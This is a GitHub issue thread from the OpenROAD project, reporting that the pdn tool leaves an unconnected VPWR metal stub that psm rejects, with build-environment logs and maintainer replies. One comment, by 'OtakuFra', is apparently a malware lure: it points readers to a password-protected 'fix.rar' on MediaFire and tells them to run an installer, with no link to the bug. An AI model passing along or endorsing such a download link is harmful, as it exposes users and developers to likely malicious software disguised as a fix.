The-OpenROAD-Project/OpenROAD #5659: `pdn` generates hanging unconnected piece of metal and `psm` doesn't like it

donn, 2024-08-27:
### Describe the bug

Still toying around with `mpl2` when this happened

[image]

This VPWR strip doesn't have enough overlap to create a via and is thus just vibing there

### Expected Behavior

That strip of metal should be culled unless I specify `-skiptrim`, no?

### Environment

```shell
Git commit: 6b5937db431d2fa1023d3865f21ccd9b65781492
kernel: Darwin 23.6.0
os: macOS 14.6.1
cmake version 3.29.2
CMake Warning at src/CMakeLists.txt:267 (message):
  spdlog: SPDLOG_FMT_EXTERNAL=ON

CMake Warning (dev) at src/sta/CMakeLists.txt:32 (option):
  Policy CMP0077 is not set: option() honors normal variables.  Run "cmake
  --help-policy CMP0077" for policy details.  Use the cmake_policy command to
  set the policy and suppress this warning.

  For compatibility with older versions of CMake, option is clearing the
  normal variable 'USE_TCL_READLINE'.
This warning is for project developers.  Use -Wno-dev to suppress it.

Number of processor cores: 24
CMake Warning:
  Manually-specified variables were not used by the project:

    VERBOSE

-- The CXX compiler identification is Clang 16.0.6
-- Detecting CXX compiler ABI info
-- Detecting CXX compiler ABI info - done
-- Check for working CXX compiler: /nix/store/3npblfzpc62lnby7l43hh1ql2k4ybd8j-clang-wrapper-16.0.6/bin/clang++ - skipped
-- Detecting CXX compile features
-- Detecting CXX compile features - done
-- OpenROAD version: v2.0-15367-g6b5937db4
-- System name: Darwin
-- Compiler: Clang 16.0.6
-- Build type: RELEASE
-- Install prefix: /var/empty/local
-- C++ Standard: 17
-- C++ Standard Required: ON
-- C++ Extensions: OFF
-- The C compiler identification is Clang 16.0.6
-- Detecting C compiler ABI info
-- Detecting C compiler ABI info - done
-- Check for working C compiler: /nix/store/3npblfzpc62lnby7l43hh1ql2k4ybd8j-clang-wrapper-16.0.6/bin/clang - skipped
-- Detecting C compile features
-- Detecting C compile features - done
-- Performing Test C_COMPILER_SUPPORTS__-Wall
-- Performing Test C_COMPILER_SUPPORTS__-Wall - Success
-- Performing Test CXX_COMPILER_SUPPORTS__-Wall
-- Performing Test CXX_COMPILER_SUPPORTS__-Wall - Success
-- Performing Test C_COMPILER_SUPPORTS__-Wno-array-bounds
-- Performing Test C_COMPILER_SUPPORTS__-Wno-array-bounds - Success
-- Performing Test CXX_COMPILER_SUPPORTS__-Wno-array-bounds
-- Performing Test CXX_COMPILER_SUPPORTS__-Wno-array-bounds - Success
-- Performing Test C_COMPILER_SUPPORTS__-Wno-nonnull
-- Performing Test C_COMPILER_SUPPORTS__-Wno-nonnull - Success
-- Performing Test CXX_COMPILER_SUPPORTS__-Wno-nonnull
-- Performing Test CXX_COMPILER_SUPPORTS__-Wno-nonnull - Success
-- Performing Test C_COMPILER_SUPPORTS__-Wno-maybe-uninitialized
[... 107 lines cut ...]
-- Found Boost: /nix/store/2hcpsv7w8pryyh3fxfydghzwrv88kd14-boost-1.83.0-dev/lib/cmake/Boost-1.83.0/BoostConfig.cmake (found version "1.83.0") found components: serialization
-- Could NOT find VTune (missing: VTune_LIBRARIES VTune_INCLUDE_DIRS) 
-- Found Boost: /nix/store/2hcpsv7w8pryyh3fxfydghzwrv88kd14-boost-1.83.0-dev/lib/cmake/Boost-1.83.0/BoostConfig.cmake (found suitable version "1.83.0", minimum required is "1.78")
-- TCL library: /nix/store/qp7hp26wp979jbbhfsj9xajz07791jvp-tcl-8.6.13/lib/libtcl.dylib
-- TCL header: /nix/store/qp7hp26wp979jbbhfsj9xajz07791jvp-tcl-8.6.13/include/tcl.h
-- Found Boost: /nix/store/2hcpsv7w8pryyh3fxfydghzwrv88kd14-boost-1.83.0-dev/lib/cmake/Boost-1.83.0/BoostConfig.cmake (found version "1.83.0") found components: serialization system thread
-- Found Boost: /nix/store/2hcpsv7w8pryyh3fxfydghzwrv88kd14-boost-1.83.0-dev/lib/cmake/Boost-1.83.0/BoostConfig.cmake (found version "1.83.0")
-- Found Eigen3: /nix/store/5yg338mlvhda5s0bzhzsf9zhal6qsh9b-eigen-3.4.0/share/eigen3/cmake/Eigen3Config.cmake (found version "3.4.0")
-- TCL readline enabled
-- Tcl Extended disabled
-- Python3 enabled
-- Configuring done (15.3s)
-- Generating done (1.1s)
-- Build files have been written to: /tmp/nix-shell.ghnVUu/tmp.QUYZr9y3Av
```

### To Reproduce

./run.sh

[repro.tgz](https://github.com/user-attachments/files/16764125/repro.tgz)

### Additional Context

As usual, I added `$cmakeFlags` to `./Env.sh` so it could pick up on the Nix dependencies.

OtakuFra, 2024-08-27:
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

maliberty, 2024-08-27:
@gadfort thoughts?

gadfort, 2024-09-04:
At present if a via fails to be created floating stubs are left behind which they should not, I'll take a look at fixing this issue this week

maliberty, 2025-06-16:
@gadfort did this get resovled?